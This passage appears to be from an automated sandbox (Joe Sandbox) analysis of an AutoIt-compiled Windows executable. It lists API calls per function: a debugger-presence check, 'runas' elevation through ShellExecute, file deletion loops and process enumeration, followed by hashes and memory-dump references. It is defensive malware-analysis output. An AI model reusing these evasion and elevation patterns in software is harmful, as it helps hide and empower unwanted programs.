101042->101043 101044 f65fd4 IcmpCloseHandle WSACleanup 101043->101044 101044->101034 101046 f5494a 3 API calls 101045->101046 101047 f5413f 101046->101047 101047->100890 101048->100903 101049->100903 101050->100890 101051->100870 101052->100871 101053->100864 101054->100877 101055->100879 101056->100870 101057->100870 101058->100890 101059->100888 101060->100904 101061->100907 101062->100856 101063->100904 101064->100856 101065->100856 101066->100904 101067->100904 101069 ef4fa8 101068->101069 101070 f2dd2b 101068->101070 101075 f10fe6 Mailbox 59 API calls 101069->101075 101071 f2dd3c 101070->101071 101073 f01821 59 API calls 101070->101073 101072 f019e1 59 API calls 101071->101072 101074 f2dd46 101072->101074 101073->101071 101078 ef4fd4 101074->101078 101079 f01207 59 API calls 101074->101079 101076 ef4fbb 101075->101076 101076->101074 101077 ef4fc6 101076->101077 101077->101078 101080 f01a36 59 API calls 101077->101080 101078->100920 101078->100923 101079->101078 101080->101078 101082 f0410a 2 API calls 101081->101082 101083 f041f7 101082->101083 101084 f0410a 2 API calls 101083->101084 101085 f0420b 101084->101085 101085->100937 101087 f57c8a 101086->101087 101088 f10fe6 Mailbox 59 API calls 101087->101088 101089 f57c91 101088->101089 101090 f57c9d 101089->101090 101091 f57cbe 101089->101091 101092 f10fe6 Mailbox 59 API calls 101090->101092 101093 f10fe6 Mailbox 59 API calls 101091->101093 101094 f57ca6 _memset 101092->101094 101093->101094 101094->100950 101095->100922 101096->100947 101097->100951 101098->100952 101099->100923 101100->100923 101101->100970 101102->100970 101103->100983 101104->101015 101105->101015 98292 f301f8 98293 f301fa 98292->98293 98296 f54d18 SHGetFolderPathW 98293->98296 98297 f01821 59 API calls 98296->98297 98298 f30203 98297->98298 98299 ef6981 98306 ef373a 98299->98306 98301 ef6997 98315 ef7b3f 98301->98315 98303 ef69bf 98305 ef584d 98303->98305 98327 f5a48d 89 API calls 4 library calls 98303->98327 98307 ef3758 98306->98307 98308 ef3746 98306->98308 98310 ef375e 98307->98310 98311 ef3787 98307->98311 98328 ef523c 59 API calls 98308->98328 98314 f10fe6 Mailbox 59 API calls 98310->98314 98329 ef523c 59 API calls 98311->98329 98313 ef3750 98313->98301 98314->98313 98330 f0162d 98315->98330 98317 ef7b64 _wcscmp 98318 f01a36 59 API calls 98317->98318 98319 ef7b98 Mailbox 98317->98319 98320 f2ffad 98318->98320 98319->98303 98335 f017e0 98320->98335 98324 f2ffc9 98326 f2ffcd Mailbox 98324->98326 98345 ef523c 59 API calls 98324->98345 98326->98303 98327->98305 98328->98313 98329->98313 98331 f10fe6 Mailbox 59 API calls 98330->98331 98332 f01652 98331->98332 98333 f10fe6 Mailbox 59 API calls 98332->98333 98334 f01660 98333->98334 98334->98317 98336 f3f401 98335->98336 98337 f017f2 98335->98337 98352 f487f9 59 API calls _memmove 98336->98352 98346 f01680 98337->98346 98340 f017fe 98344 ef3938 68 API calls 98340->98344 98341 f3f40b 98342 f01c9c 59 API calls 98341->98342 98343 f3f413 Mailbox 98342->98343 98344->98324 98345->98326 98347 f01692 98346->98347 98351 f016ba _memmove 98346->98351 98348 f10fe6 Mailbox 59 API calls 98347->98348 98347->98351 98350 f0176f _memmove 98348->98350 98349 f10fe6 Mailbox 59 API calls 98349->98350 98350->98349 98351->98340 98352->98341

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F0526C
                                                    • IsDebuggerPresent.KERNEL32 ref: 00F0527E
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00F052E6
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                      • Part of subcall function 00EFBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EFBC07
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F05366
                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00F40B2E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F40B66
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FA6D10), ref: 00F40BE9
                                                    • ShellExecuteW.SHELL32(00000000), ref: 00F40BF0
                                                      • Part of subcall function 00F0514C: GetSysColorBrush.USER32(0000000F), ref: 00F05156
                                                      • Part of subcall function 00F0514C: LoadCursorW.USER32(00000000,00007F00), ref: 00F05165
                                                      • Part of subcall function 00F0514C: LoadIconW.USER32(00000063), ref: 00F0517C
                                                      • Part of subcall function 00F0514C: LoadIconW.USER32(000000A4), ref: 00F0518E
                                                      • Part of subcall function 00F0514C: LoadIconW.USER32(000000A2), ref: 00F051A0
                                                      • Part of subcall function 00F0514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F051C6
                                                      • Part of subcall function 00F0514C: RegisterClassExW.USER32(?), ref: 00F0521C
                                                      • Part of subcall function 00F050DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F05109
                                                      • Part of subcall function 00F050DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F0512A
                                                      • Part of subcall function 00F050DB: ShowWindow.USER32(00000000), ref: 00F0513E
                                                      • Part of subcall function 00F050DB: ShowWindow.USER32(00000000), ref: 00F05147
                                                      • Part of subcall function 00F059D3: _memset.LIBCMT ref: 00F059F9
                                                      • Part of subcall function 00F059D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F05A9E
                                                    Strings
                                                    • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00F40B28
                                                    • AutoIt, xrefs: 00F40B23
                                                    • runas, xrefs: 00F40BE4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                    • API String ID: 529118366-2030392706
                                                    • Opcode ID: f711ca80c4859250fda0a170db6c0e9686af9d6c8538d62a5a634baa53e01094
                                                    • Instruction ID: 7dc961c0f60914b55a22a35db7a98e2ac9d85da5c93450bc21332fa52db310cc
                                                    • Opcode Fuzzy Hash: f711ca80c4859250fda0a170db6c0e9686af9d6c8538d62a5a634baa53e01094
                                                    • Instruction Fuzzy Hash: 8C51C131D0834CAADF11BBB0DC45EFE7B79AF85740B104169F951A21A2CAB85949FF21

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                      • Part of subcall function 00F54FEC: GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F53D96
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F53E3E
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F53E51
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F53E6E
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F53E90
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F53EAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: 897d726a79b3f9e0a2fd429368bca54da52046d1772afe5b5f17d5a9eadceba0
                                                    • Instruction ID: 839b36dad2f24b7d1dc7ab73a216ca79b81d2f574a79c108d8159fe6307f5fe5
                                                    • Opcode Fuzzy Hash: 897d726a79b3f9e0a2fd429368bca54da52046d1772afe5b5f17d5a9eadceba0
                                                    • Instruction Fuzzy Hash: 68516D3180115DABCF16EBA4CD929EDB7B9AF10351F604165E942A3092EF396F0DFB60

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 957 f05d13-f05d73 call f01207 GetVersionExW call f01821 962 f05e78-f05e7a 957->962 963 f05d79 957->963 965 f40fa9-f40fb5 962->965 964 f05d7c-f05d81 963->964 966 f05d87 964->966 967 f05e7f-f05e80 964->967 968 f40fb6-f40fba 965->968 971 f05d88-f05dbf call f01981 call f0133d 966->971 967->971 969 f40fbc 968->969 970 f40fbd-f40fc9 968->970 969->970 970->968 972 f40fcb-f40fd0 970->972 980 f05dc5-f05dc6 971->980 981 f41098-f4109b 971->981 972->964 974 f40fd6-f40fdd 972->974 974->965 976 f40fdf 974->976 979 f40fe4-f40fea 976->979 982 f05e00-f05e17 GetCurrentProcess IsWow64Process 979->982 983 f40fef-f40ffa 980->983 984 f05dcc-f05dcf 980->984 985 f410b4-f410b8 981->985 986 f4109d 981->986 991 f05e19 982->991 992 f05e1c-f05e2d 982->992 987 f41017-f41019 983->987 988 f40ffc-f41002 983->988 984->982 989 f05dd1-f05def 984->989 993 f410a3-f410ac 985->993 994 f410ba-f410c3 985->994 990 f410a0 986->990 998 f4103c-f4103f 987->998 999 f4101b-f41027 987->999 995 f41004-f41007 988->995 996 f4100c-f41012 988->996 989->982 997 f05df1-f05df7 989->997 990->993 991->992 1001 f05e98-f05ea2 GetSystemInfo 992->1001 1002 f05e2f-f05e3f call f055f0 992->1002 993->985 994->990 1000 f410c5-f410c8 994->1000 995->982 996->982 997->979 1006 f05dfd 997->1006 1003 f41065-f41068 998->1003 1004 f41041-f41050 998->1004 1007 f41031-f41037 999->1007 1008 f41029-f4102c 999->1008 1000->993 1009 f05e65-f05e75 1001->1009 1014 f05e41-f05e4e call f055f0 1002->1014 1015 f05e8c-f05e96 GetSystemInfo 1002->1015 1003->982 1013 f4106e-f41083 1003->1013 1010 f41052-f41055 1004->1010 1011 f4105a-f41060 1004->1011 1006->982 1007->982 1008->982 1010->982 1011->982 1016 f41085-f41088 1013->1016 1017 f4108d-f41093 1013->1017 1022 f05e50-f05e54 GetNativeSystemInfo 1014->1022 1023 f05e85-f05e8a 1014->1023 1019 f05e56-f05e5a 1015->1019 1016->982 1017->982 1019->1009 1021 f05e5c-f05e5f FreeLibrary 1019->1021 1021->1009 1022->1019 1023->1022
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00F05D40
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • GetCurrentProcess.KERNEL32(?,00F80A18,00000000,00000000,?), ref: 00F05E07
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00F05E0E
                                                    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00F05E54
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F05E5F
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F05E90
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F05E9C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: 7d4d0d0d228a1b10322de9b0fab181ddd5e1e19c85f1446192ddaef5e5360534
                                                    • Instruction ID: 346d9fde6171b67085f0a13bc28e78979f45b8335581f5cb965000eaca26b4a1
                                                    • Opcode Fuzzy Hash: 7d4d0d0d228a1b10322de9b0fab181ddd5e1e19c85f1446192ddaef5e5360534
                                                    • Instruction Fuzzy Hash: DC91E631949BC4DEC731CB78C4541ABBFE5AF25310B880A5ED0C783A81D674A58CFB59

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1024 f54005-f5404c call f01207 * 3 call f10284 call f54fec 1035 f5405c-f5408d call f10119 FindFirstFileW 1024->1035 1036 f5404e-f54057 call f01900 1024->1036 1040 f540fc-f54103 FindClose 1035->1040 1041 f5408f-f54091 1035->1041 1036->1035 1042 f54107-f54129 call f01cb6 * 3 1040->1042 1041->1040 1043 f54093-f54098 1041->1043 1045 f540d7-f540e9 FindNextFileW 1043->1045 1046 f5409a-f540d5 call f01c9c call f017e0 call f01900 DeleteFileW 1043->1046 1045->1041 1047 f540eb-f540f1 1045->1047 1046->1045 1059 f540f3-f540fa FindClose 1046->1059 1047->1041 1059->1042
                                                    APIs
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                      • Part of subcall function 00F54FEC: GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5407C
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F540CC
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F540DD
                                                    • FindClose.KERNEL32(00000000), ref: 00F540F4
                                                    • FindClose.KERNEL32(00000000), ref: 00F540FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: 0ee53e6701dedbc2cd77d5273c90aa15d7b7a18bd147ca3930fbe76f901fda9b
                                                    • Instruction ID: bf23dae95f5f26d657b27ce397d6219fb263ca4a0c8b233cdde291bc087fc5d8
                                                    • Opcode Fuzzy Hash: 0ee53e6701dedbc2cd77d5273c90aa15d7b7a18bd147ca3930fbe76f901fda9b
                                                    • Instruction Fuzzy Hash: 96317E31008385ABC301EB60CC959EFB7E8BE95315F444A1DF9E5821D2DB64EA4DF7A2
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F5416D
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F5417B
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F5419B
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F54245
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: e7ec85af8115f25634b623391584217174c6897dc568d99388a440b3151dc227
                                                    • Instruction ID: 38f26b45d7f9aeebfe0361756652b4d6e7d7d10a6447bd244423fe774e7b89a0
                                                    • Opcode Fuzzy Hash: e7ec85af8115f25634b623391584217174c6897dc568d99388a440b3151dc227
                                                    • Instruction Fuzzy Hash: F631A0711083419FD301EF50DC85AAFBBE8BF95355F40052DFA86C21E1EB74AA89EB52
                                                    APIs
                                                      • Part of subcall function 00F03740: CharUpperBuffW.USER32(?,00FB71DC,00000000,?,00000000,00FB71DC,?,00EF53A5,?,?,?,?), ref: 00F0375D
                                                    • _memmove.LIBCMT ref: 00EFB68A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper_memmove
                                                    • String ID:
                                                    • API String ID: 2819905725-0
                                                    • Opcode ID: 32585744299c66121312964b307ae808df082d44e98628ff961e82249e6d12a7
                                                    • Instruction ID: 87262722dec6a609d148a4ed2854b5caba27f91160f96877d95942493c65bcb5
                                                    • Opcode Fuzzy Hash: 32585744299c66121312964b307ae808df082d44e98628ff961e82249e6d12a7
                                                    • Instruction Fuzzy Hash: 51A29870A08345CFC720DF24C480B6AB7E1BF88314F14995DEA9AAB361D774ED85DB92
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F3FC86), ref: 00F5495A
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5496B
                                                    • FindClose.KERNEL32(00000000), ref: 00F5497B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 8dbbde229608c0788b7f0e12e2fec32df15a33912d376517ab1f5caff1c4f5f3
                                                    • Instruction ID: dec245585f933fe6b9b2f4d606e5797bdc9831881a49bda3cd7ef54ad2bea115
                                                    • Opcode Fuzzy Hash: 8dbbde229608c0788b7f0e12e2fec32df15a33912d376517ab1f5caff1c4f5f3
                                                    • Instruction Fuzzy Hash: 67E048318149199757106738EC4E8FA775C9F4637AF500715F935C11D0EB70A98C6796
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d28d0a4d07aa95800ec0866cbf0ee07fe097733267a9c8f0f0f26dc685d4414c
                                                    • Instruction ID: 1c1af068b13383abe283305ae8c929241b4299922509045f9d2e8fb076428bad
                                                    • Opcode Fuzzy Hash: d28d0a4d07aa95800ec0866cbf0ee07fe097733267a9c8f0f0f26dc685d4414c
                                                    • Instruction Fuzzy Hash: 9B22AE74E0020ACFDB24DF54C880BBEB7B0FF49310F159169EA86AB352D774A985DB91
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00EFBF57
                                                      • Part of subcall function 00EF52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF52E6
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00F336B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePeekSleepTimetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                    • API String ID: 1792118007-922114024
                                                    • Opcode ID: 24c5543f7ac7a9602b82a9eb27cfc41129c18487dd318935e9ac0dfff7c72f76
                                                    • Instruction ID: de5cd7774322bddb48d2978a54e79bbc2da5cd6f717b68992da2ab259a39ff3a
                                                    • Opcode Fuzzy Hash: 24c5543f7ac7a9602b82a9eb27cfc41129c18487dd318935e9ac0dfff7c72f76
                                                    • Instruction Fuzzy Hash: F8C2C070608345DFD728DF24C884BAABBE4FF84314F14491DF68A972A1CB75E984EB52

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EF3444
                                                    • RegisterClassExW.USER32(00000030), ref: 00EF346E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EF349C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EF34AC
                                                    • LoadIconW.USER32(000000A9), ref: 00EF34C2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EF34D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 5d712fae09120c4cc09ee938b4dec018bab94ec8a2457919e0eda3513cd0e851
                                                    • Instruction ID: a1fcaac82b415ccbadc766610242b14746c38cd66b7a6f5472e4b1bc3cf93d31
                                                    • Opcode Fuzzy Hash: 5d712fae09120c4cc09ee938b4dec018bab94ec8a2457919e0eda3513cd0e851
                                                    • Instruction Fuzzy Hash: E531467184430DAFDB809FA4EC89ADDBBF0FB09310F20425AE580A62A0D7B95545EF51

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EF3444
                                                    • RegisterClassExW.USER32(00000030), ref: 00EF346E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EF349C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EF34AC
                                                    • LoadIconW.USER32(000000A9), ref: 00EF34C2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EF34D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 21b2845fff244e721afd452ce31fa9cb5729fa616a2c5e71060fdb387fd251ed
                                                    • Instruction ID: 8dcd513499c38a449474d96ceb8a4357d883e1602da1502c5a70721bcf80b419
                                                    • Opcode Fuzzy Hash: 21b2845fff244e721afd452ce31fa9cb5729fa616a2c5e71060fdb387fd251ed
                                                    • Instruction Fuzzy Hash: FA21E5B190430DAFDB40AFA4EC89BDDBBF4FB08700F50421AF515A62A0DBB15544EF91

                                                    Control-flow Graph

                                                    APIs
